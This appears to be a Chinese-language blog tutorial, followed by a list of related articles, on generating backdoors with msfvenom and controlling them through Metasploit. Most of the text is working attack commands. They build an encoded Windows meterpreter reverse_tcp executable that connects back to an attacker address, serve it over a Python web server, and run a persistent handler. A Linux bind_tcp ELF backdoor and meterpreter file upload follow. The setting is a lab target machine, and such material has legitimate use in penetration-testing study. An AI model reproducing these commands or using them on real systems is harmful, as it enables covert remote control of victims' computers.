msfvenom生成后门程序及利用
目录
一、生成windows后门
二、生成linux后门
解决shell乱码
上传文件
一、生成windows后门
1. 生成windows后门
msfvenom -platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.1.3 lport=4444 -b"\x00" -e x86/shikata_ga_nai -f exe > ./payload2.exe
- -b 需要排除的字符
- -e 编码方式
- -f 输出格式
- LHOST 本地机器的地址,供木马连接
接着将payload发送到win2012主机上,这里用python开启一个web服务,python3 -m http.server 5555
2. msf 开启主监听端口
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- show options
- set lhost 192.168.1.3 ,set lport 4444 (和一开始设置的后门程序的端口一样)
#持续监听
- set ExitOnSession false
#攻击在后台进行
- exploit -j
此时meterpreter获取到了一个session即shell反弹成功,但只是一个低权限的session。如果本机开了防火墙则可能靶机连接不上我们的机器,会阻止端口进行连接我们。
可见只是一个管理员的权限,并不是system权限
二、生成linux后门
1. 生成正向连接后门
正向连接是靶机开放端口,攻击机连过去;反向连接是攻击机开放端口,靶机连过来;
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=8000 -f elf > bindtcp.elf
加执行权限
chmod 777 bindtcp.elf
运行
./bindtcp.elf
攻击机开启连接,其会主动连接靶机的8000端口:
- msfconsole
- use exploit/multi/handler
- set payload linux/x64/meterpreter/bind_tcp
- set rhost xx.xx.xx.xx
- set lport 8000 (刚才设置的端口)
- run
解决shell乱码
chcp 65001
上传文件
upload 本地文件路径\文件名 目标路径\文件名
windows下要用两个斜杠
msfvenom生成后门程序及利用相关推荐
- msfvenom生成木马的简单利用
msfvenom生成木马的简单利用 1.简介 本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10. 2.实 ...
- 利用msfvenom生成后门木马
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload an ...
- 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)
MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...
- Java 技术篇-利用exe4j工具生成exe文件实例演示,IntelliJ IDEA将项目转化为jar包方法,运行生成后的程序弹出exe4j提示处理,生成的程序显示控制台设置方法
Java 项目转化为 exe 可执行文件 第一章:IntelliJ IDEA 将项目转化为 jar 包 ① 设置 Artifacts ② 设置是否集成外部 jar 包 ③ 将 java 项目转化为 j ...
- 利用mysql上传木马_通过Mysql语句生成后门木马的方法_MySQL
通过Mysql 的语句生成后门木马的方法! SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656 ...
- msfvenom生成木马和内网穿透
msfvenom命令行选项如下: 英文原版 中文版: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载).如果需要使用自定义的pay ...
- Msfvenonm生成后门
目录 Msfvenom 生成exe木马 生成Linux木马 方法一: 方法二: 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->Metasp ...
- kali metasploit 制作后门程序远程操控基本使用方法
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_t ...
- kali生成后门远程控制电脑或手机
一.复现环境 Kali平台(Hack):192.168.25.128 靶机:192.168.25.106 Android模拟器(靶机1):192.168.25.106 注意,手机端控制必须使手机和 ...
- 使用 .NET WinForm 开发所见即所得的 IDE 开发环境,实现不写代码直接生成应用程序...
GitHub:https://github.com/iccb1013/Sheng.Winform.IDE SailingEase WinForm Framework WinForm开发框架开发手册:h ...
最新文章
- AI在管理临床试验设计和执行中,人和机器还在学习曲线上?
- python菜鸟编程-Python3 函数
- 网工路由基础(3)RIP原理与配置
- matlab如何创建table,MATLAB table数据结构 首篇
- matlab 滤波器设计 coe_一种半带滤波器的低功耗实现方法
- 基本排序看这篇就够了
- 端口扫描实验和Dos攻击实验
- 微信接口请求次数_微信接口调用次数限制 支付宝微信提现
- 2018计算机应用基础作业一,2018计算机应用基础试题及答案
- 量子计算机王,王正汉|量子计算机:下一轮工业革命的引擎
- python与vfp做桌面数据库_Python:如何提高将数据从vfp(dbf)加载到oracle的效率?...
- Java读取Oracle中LONG类型数据
- 看完这篇,你也可以实现一个360度全景插件
- java编程:对两个分数进行简单的算术运算
- input button 光标变为手型
- 【前端面试】04 HTTP协议
- 组装一台电脑需要哪些基本配件?
- Xshell配色美化
- MindMapper屏幕捕获功能该如何使用
- Go语言实现枚举方法,const和iota结合轻松实现